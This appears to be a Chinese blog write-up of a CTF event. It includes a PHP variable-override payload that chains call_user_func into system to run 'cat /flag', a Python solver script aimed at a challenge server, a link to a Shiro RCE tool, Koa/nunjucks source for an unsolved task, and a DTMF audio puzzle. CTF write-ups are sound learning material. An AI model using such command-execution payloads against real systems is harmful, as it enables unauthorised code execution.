CnHongke
image-20210205120848244

WEB

EDR

        extract($argv);
        var_dump($collect);
        if (!isset($limit)) {
            return;
        }
        $result = $collect($path, $row, $limit, $host);

变量覆盖 加 call_user_func

payload

host=cat /flag&limit=system&path=call_user_func&row=call_user_func&collect=call_user_func

fast x 3

原题

import requests
import re,urllib.parse,binascii
# 必须要有Cookie,否则每次读取的值不一样,不能正常解题
header = { 
    "Cookie":"session=3318ae57-680f-45f8-864a-14dbdf736032; PHPSESSID=397hupqilugksvv6ebidg8dha1"
}

url = "http://180.109.90.207:23939"
rep = requests.get(url,headers=header)

ress = rep.text
res = re.findall('id="math">(.*?)</div></b>',ress)
print(res)

n = len(res[0])
re = res[0]
a= []
for i in range(0,n):
    a.append(re[i])
a.sort()
b = []
count = 0 

for i in range(0,n-1):
    if(a[i] != a[i+1]):
        b.append(a[i])
b.append(a[-1])

count = []
mnm = []
for i in range (len(b)):
    mmm = 0 
    for j in range(len(a)):
        if(b[i] ==  a[j]):
            mmm = mmm + 1
    mnm.append(mmm)
    count.append(mmm)

count.sort()
sss =''
print(mnm,count)
for i in range(len(b)):
    for j in range(len(b)):
        if(count[i] == mnm[j] ):
            sss=sss+b[j]

print(sss)
data= {
    "res":sss
}
ccc = requests.post(url,data=data,headers=header)

print(ccc.text)

Shiro

https://github.com/wyzxxz/shiro_rce_tool
image-20210205101832778

Reset [没有做出来]

获得源代码

image-20210205114656772
  • app.js
const Koa = require('koa');
const bodyParser = require('koa-bodyparser');
const controller = require('./controller');
const templating = require('./templating');
const app = new Koa();
const isProduction = process.env.NODE_ENV === 'production';

app.use(async (ctx, next) => {
    console.log(`Process ${ctx.request.method} ${ctx.request.url}...`);
    await next();
});

let staticFiles = require('./static-files');
app.use(staticFiles('/static/', __dirname + '/static'));

app.use(bodyParser());

app.use(templating('views', {
    noCache: !isProduction,
    watch: !isProduction
}));

app.use(controller());

app.listen(3000);
console.log('app started at port 3000...');
  • controller.js
const fs = require('fs');

function addMapping(router, mapping) {
    for (var url in mapping) {
        if (url.startsWith('GET ')) {
            var path = url.substring(4);
            router.get(path, mapping[url]);
            console.log(`register URL mapping: GET ${path}`);
        } else if (url.startsWith('POST ')) {
            var path = url.substring(5);
            router.post(path, mapping[url]);
            console.log(`register URL mapping: POST ${path}`);
        } else if (url.startsWith('PUT ')) {
            var path = url.substring(4);
            router.put(path, mapping[url]);
            console.log(`register URL mapping: PUT ${path}`);
        } else if (url.startsWith('DELETE ')) {
            var path = url.substring(7);
            router.del(path, mapping[url]);
            console.log(`register URL mapping: DELETE ${path}`);
        } else {
            console.log(`invalid URL: ${url}`);
        }
    }
}

function addControllers(router, dir) {
    fs.readdirSync(__dirname + '/' + dir).filter((f) => {
        return f.endsWith('.js');
    }).forEach((f) => {
        console.log(`process controller: ${f}...`);
        let mapping = require(__dirname + '/' + dir + '/' + f);
        addMapping(router, mapping);
    });
}

module.exports = function (dir) {
    let
        controllers_dir = dir || 'controllers',
        router = require('koa-router')();
    addControllers(router, controllers_dir);
    return router.routes();
};
  • templating.js
const nunjucks = require('nunjucks');

function createEnv(path, opts) {
    var
        autoescape = opts.autoescape === undefined ? true : opts.autoescape,
        noCache = opts.noCache || false,
        watch = opts.watch || false,
        throwOnUndefined = opts.throwOnUndefined || false,
        env = new nunjucks.Environment(
            new nunjucks.FileSystemLoader(path, {
                noCache: noCache,
                watch: watch,
            }), {
                autoescape: autoescape,
                throwOnUndefined: throwOnUndefined
            });
    if (opts.filters) {
        for (var f in opts.filters) {
            env.addFilter(f, opts.filters[f]);
        }
    }
    return env;
}

function templating(path, opts) {
    var env = createEnv(path, opts);
    return async (ctx, next) => {
        ctx.render = function (view, model) {
            ctx.response.body = env.render(view, Object.assign({}, ctx.state || {}, model || {}));
            ctx.response.type = 'text/html';
        };
        await next();
    };
}

module.exports = templating;

MISC

DTMF

audacity 转换音频格式

再利用dtmf2num.exe 获得信息

image-20210205103045343
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇